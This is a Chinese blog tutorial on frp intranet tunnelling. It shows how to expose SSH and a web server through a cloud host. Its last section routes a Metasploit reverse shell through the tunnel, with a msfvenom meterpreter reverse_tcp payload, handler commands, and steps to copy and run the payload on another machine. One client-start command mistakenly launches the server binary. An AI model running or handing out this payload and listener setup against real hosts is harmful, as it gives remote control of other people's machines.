龙空技术网

Frp内网穿透

菜鸟学网安 823

前言:

今天兄弟们对“centos内外网穿透”大概比较讲究,看官们都需要学习一些“centos内外网穿透”的相关资讯。那么小编也在网摘上收集了一些有关“centos内外网穿透””的相关知识,希望大家能喜欢,咱们一起来学习一下吧!

内网穿透从本质上来讲也是端口映射,两者都是将内网地址映射到公网可访问的地址,而区别是端口映射直接在路由器中配置即可,而内网穿透配置的端口映射则需要客户端和服务端进行绑定后实现,相当于客户端和服务端之间建立了一条隧道,然后访问服务端的请求会通过隧道转发给内网主机,该情况多用于没有公网 IP 的情况下使用;

frp是一个高性能的反向代理应用,可以轻松地进行内网穿透,对外网提供服务, 支持tcp, udp, http, https等协议类型,可以将内网服务以安全、便捷的方式通过具有公网 IP 节点的中转暴露到公网;

## 中文文档地址:   ## github 下载地址:  

Frp有客户端和服务端,根据所安装主机的系统下载好对应的版本,这里下载了两个版本,一个windows版本,一个linux版本;

1、映射内网SSH服务

将linux版本文件通过xshell上传到云服务器,并进行解压;

## 解压文件tar xf frp_0.33.0_linux_amd64.tar.gz
## 文件涵义frpc            客户端程序 frpc_full.ini   客户端完整配置文件 frpc.ini        客户端简易配置文件 frps            服务端程序 frps_full.ini   服务端完整配置文件 frps.ini        服务端简易配置文件

查看简易配置文件,配置了侦听端口为7000,即服务端与客户端通讯的端口;

启动服务端程序;

 ## 以简易配置启动服务端程序 ./frps -c ./frps.ini 

在本地CentOS7中解压linux版本文件,并修改客户端简易配置文件frpc.ini;

## 客户端简易配置文件frpc.ini[common]server_addr = 123.456.789.111     ## 远程云主机的公网ip地址server_port = 7000                ## 服务端侦听的端口[ssh] type = tcp                  ## 协议类型                 local_ip = 127.0.0.1        ## 本地的ip地址local_port = 22             ## 本地的端口remote_port = 6000          ## 映射到服务端的端口

启动客户端程序;

## 以简易配置启动客户端程序./frpc -c frpc.ini

此时云主机上服务端会显示已经成功的日志信息;

在云主机上查看6000端口的状态,显示已经配置了TCP监听;

通过xshell访问云主机公网ip的6000端口就可以访问内网主机;

2、映射内网Web服务

配置服务端的配置文件frps.ini,vhost_http_port为http服务访问端口,vhost_https_port为https服务访问端口,此处以http服务为例;

## frps.ini配置文件[common]bind_port = 7000vhost_http_port = 8080

配置完成后启动服务端程序;

 ## 以简易配置启动服务端程序 ./frps -c ./frps.ini 

更改客户端的配置文件frpc.ini;

## frpc.ini配置文件[common]server_addr = 123.456.789.111   ## 云主机的公网IPserver_port = 7000              ## 服务端绑定的端口[web]type = httplocal_port = 80                 ## 本地Web服务的端口custom_domains =   ## 解析到公网IP上的域名

启动客户端程序;

 ## 以简易配置启动客户端程序 ./frps -c ./frps.ini 

服务端可以查看到成功链接的日志信息;

访问域名:8080就可以访问本地的Web服务;

3、配置MSF接收来自公网的shell

服务端配置文件不用改变,修改客户端配置文件即可,然后启动客户端程序;

## frpc.ini配置文件[common]server_addr = 123.456.789.111   ## 云主机的公网IPserver_port = 7000              ## 服务端绑定的端口[msf] type = tcp local_port = 4444       ## 本地待监听端口local_ip = 127.0.0.1 remote_port = 8085      ## 云主机映射端口

生成 payload ,LHOST 指定为公网 IP,LPORT 指定为公网映射端口;

## 使用msfvenom生成payloadmsfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=123.456.789.111 LPORT=8085 -b "\x00" -f elf -o xuyu 

本地启动 MSF 并配置侦听,此时监听LOST为本地ip地址,LPORT为frpc.ini配置文件中本地的端口;

## MSF配置本地监听use exploit/multi/handler set payload linux/x64/meterpreter/reverse_tcp set LHOST 192.168.1.105set LPORT 4444 exploit 

将payload复制到另一台Centos中,并执行;

## 复制payload并执行scp xuyu root@192.168.1.6:/root/chmod +x xuyu./xuyu

MSF 成功接收 shell ;

标签: #centos内外网穿透 #frpccentos